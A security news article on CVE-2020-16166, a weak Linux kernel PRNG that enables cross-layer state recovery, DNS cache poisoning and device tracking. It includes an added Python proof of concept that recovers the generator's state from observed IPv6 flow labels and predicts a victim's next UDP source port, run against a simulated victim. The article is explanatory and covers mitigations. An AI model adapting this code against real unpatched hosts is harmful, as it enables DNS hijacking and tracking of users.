
How a Security Flaw could Lead to Cross-layer & DNS Poisoning Attacks

by CISOCONNECT Bureau

Security researchers have discovered a new attack technique known as cross-layer attack. Read on to know more about it…

A new attack technique called the cross-layer attack has been identified. It combines weaknesses at several network protocol layers to attack a target system. An estimated one in every 20 web servers could be exposed to a flaw in the Linux kernel that makes such attacks possible.

The Cross-layer Attack
The cross-layer attack is possible because the Linux kernel's IPv6 flow label generation, UDP source port selection and IPv4 ID generation all draw on the same pseudo-random number generator (PRNG), known in the kernel as prandom. The flaw (CVE-2020-16166) is that this PRNG is weak: an attacker who observes enough of its output can reconstruct its internal state. Once the state has been recovered from values exposed at one OSI layer (for example, flow labels or IP IDs at the network layer), it can be used to predict the values the same PRNG will hand to another layer (for example, the UDP source port of a DNS query at the transport layer).

Predicting those values lets an attacker mount DNS cache poisoning attacks against Linux systems, both locally and remotely. The kernel vulnerability was discovered by Amit Klein, vice president of security research at SafeBreach and a security researcher at Israel's Bar-Ilan University.
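To make the mechanism concrete, here is an added example, not code from Klein's paper or from the kernel, that models the pre-fix prandom_u32() generator (L'Ecuyer's lfsr113 Tausworthe generator, with the parameters from lib/random32.c before the SipHash rewrite) and runs the cross-layer recovery against it. The attacker watches IPv6 flow labels, treats each as 20 bits of one PRNG output, turns every observed bit into a GF(2)-linear equation over the 128 unknown state bits (the generator is linear over GF(2), which is what makes it weak), and stops as soon as the next output, and with it the victim's next UDP source port, is fully determined. That port is what a forged DNS reply would have to be addressed to. Two simplifications are assumptions of this example, not claims about the kernel: the leak model (a flow label exposes the low 20 bits of one output; the kernel applies further transformations that change which bits leak, not the algebra) and the port model (the kernel's first candidate port in the default 32768-60999 range, assumed free). The secret state is drawn fresh per run, so the numbers printed differ each time.

```python
import os

MASK32 = 0xFFFFFFFF
LABEL_BITS = 20                        # width of an IPv6 flow label
PORT_LOW, PORT_HIGH = 32768, 60999     # default net.ipv4.ip_local_port_range
# lfsr113 (a, b, c, d) per component, from lib/random32.c before the SipHash rewrite
TAUS_PARAMS = [(6, 13, 0xFFFFFFFE, 18), (2, 27, 0xFFFFFFF8, 2),
               (13, 21, 0xFFFFFFF0, 7), (3, 12, 0xFFFFFF80, 13)]

def taus(s, a, b, c, d):
    """One TAUSWORTHE(s,a,b,c,d) step on a concrete 32-bit word."""
    return (((s & c) << d) ^ ((((s << a) & MASK32) ^ s) >> b)) & MASK32

def prandom_u32(state):
    """Concrete prandom_u32_state(): advance the 4-word state in place."""
    for i, (a, b, c, d) in enumerate(TAUS_PARAMS):
        state[i] = taus(state[i], a, b, c, d)
    return state[0] ^ state[1] ^ state[2] ^ state[3]

def random_state():
    """Fresh secret state; lfsr113 needs s1>=2, s2>=8, s3>=16, s4>=128."""
    return [int.from_bytes(os.urandom(4), "little") | m for m in (2, 8, 16, 128)]

# Symbolic twin of the generator: a word is a list of 32 masks, mask i recording
# which of the 128 unknown initial-state bits XOR into bit i.  Every step is
# GF(2)-linear, so each observed output bit becomes a linear equation.
def sym_shl(w, n): return [0] * n + w[:32 - n]
def sym_shr(w, n): return w[n:] + [0] * n
def sym_xor(u, v): return [x ^ y for x, y in zip(u, v)]
def sym_and(w, c): return [m if (c >> i) & 1 else 0 for i, m in enumerate(w)]

def sym_taus(w, a, b, c, d):
    return sym_xor(sym_shl(sym_and(w, c), d), sym_shr(sym_xor(sym_shl(w, a), w), b))

def sym_prandom_u32(state):
    """Same stepping as prandom_u32(), on the symbolic state."""
    out = [0] * 32
    for i, (a, b, c, d) in enumerate(TAUS_PARAMS):
        state[i] = sym_taus(state[i], a, b, c, d)
        out = sym_xor(out, state[i])
    return out

class GF2Solver:
    """Incremental GF(2) system; rows are (mask, value) with pivot = top bit."""
    def __init__(self):
        self.rows = {}

    def _reduce(self, mask, val):
        for p in sorted(self.rows, reverse=True):
            if (mask >> p) & 1:
                rmask, rval = self.rows[p]
                mask, val = mask ^ rmask, val ^ rval
        return mask, val

    def add(self, mask, val):
        mask, val = self._reduce(mask, val)
        if mask == 0:
            if val:
                raise ValueError("observation contradicts earlier ones")
            return
        self.rows[mask.bit_length() - 1] = (mask, val)

    def evaluate(self, mask):
        """Value of the linear form `mask`, or None if not yet determined."""
        mask, val = self._reduce(mask, 0)
        return val if mask == 0 else None

def flow_label(out):
    """ASSUMPTION: a flow label exposes the low 20 bits of one PRNG output."""
    return out & ((1 << LABEL_BITS) - 1)

def udp_source_port(out):
    """First candidate of udp_lib_get_port() via reciprocal_scale(); ASSUMPTION: it is free."""
    return ((out * (PORT_HIGH - PORT_LOW + 1)) >> 32) + PORT_LOW

def u32_from_masks(masks, solver):
    """Assemble a value from 32 symbolic bits; None while any bit is unknown."""
    bits = [solver.evaluate(m) for m in masks]
    return None if None in bits else sum(b << i for i, b in enumerate(bits))

def cross_layer_attack(victim_state, max_labels=128):
    """Watch flow labels (network layer) until the next PRNG output, and with it the
    victim's next UDP source port (transport layer), is determined.  Returns (predicted_port, actual_port, labels_needed)."""
    victim = list(victim_state)                 # secret: only outputs leak
    sym = [[1 << (32 * w + i) for i in range(32)] for w in range(4)]
    solver = GF2Solver()
    for n in range(1, max_labels + 1):
        label = flow_label(prandom_u32(victim))  # seen on the wire
        out = sym_prandom_u32(sym)               # attacker's symbolic twin
        for i in range(LABEL_BITS):
            solver.add(out[i], (label >> i) & 1)
        guess = u32_from_masks(sym_prandom_u32(list(sym)), solver)  # peek ahead
        if guess is not None:
            actual = udp_source_port(prandom_u32(victim))
            return udp_source_port(guess), actual, n
    return None, None, max_labels

if __name__ == "__main__":
    pred, actual, n = cross_layer_attack(random_state())
    print(f"{n} flow labels observed: predicted port {pred}, victim used {actual}")
```

The solver stops as soon as all 32 bits of the next output are in the span of the observed equations, which is why the number of labels it needs is small and data-dependent; the cap of 128 is generous, since 113 consecutive observations of any one output bit already pin down the 113 live state bits. Swapping the SipHash-based generator in for `taus()` would break this attack because its output is no longer a linear function of its state.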

Security Risks
According to Klein, the most powerful version of the DNS attack is against Ubuntu servers, whose DNS stub resolver is especially vulnerable. The flaw also lets an attacker fingerprint and track Android and Linux devices, and this works even when the browser is in private mode or a VPN is in use. Klein estimates that around 13.4% of web servers run Ubuntu, and that 3-5% run Ubuntu and use a public DNS service, which together are the preconditions for the attack as demonstrated.

In fact, the number could be higher than this conservative estimate, Klein told The Daily Swig. Servers using external but private DNS servers, such as those run by ISPs, are also open to attack. Klein explained: “These may very well be vulnerable, though attacking them requires a bit more intel and preparations, which is why I could not demonstrate attacking them in my research.”

DNS cache poisoning, Klein warns, opens the door to a range of exploits. “It can be used to downgrade email security, hijack emails, hijack HTTP traffic, circumvent email anti-spam and blacklisting mechanisms, mount a local DoS attack (blackhole hosts), poison reverse DNS resolutions and attack the machine’s NTP [Network Time Protocol] client, responsible for the machine’s clock,” he said.

Mitigation
Only systems running the Linux kernel, which includes Android, are affected. Other Unix-like systems such as macOS use different PRNG algorithms for these fields.

The solution is to replace the weak PRNG with a stronger one. Klein reported the issue to the Linux kernel security team in March 2020, and the maintainers developed a replacement PRNG based on SipHash.

Current Linux kernels contain the new PRNG. DNS-over-HTTPS also blocks the cache poisoning attack, provided both the stub resolver and the DNS server support it, but it does not prevent device tracking, since it changes neither the kernel PRNG nor the packet fields derived from it.

Conclusion
The latest Linux kernels contain the new PRNG and are not affected by the flaw, so the first step is to keep kernels, operating systems and applications patched with the latest updates. Where the stub resolver and the DNS server support it, DNS-over-HTTPS blocks the cache poisoning attack as well.
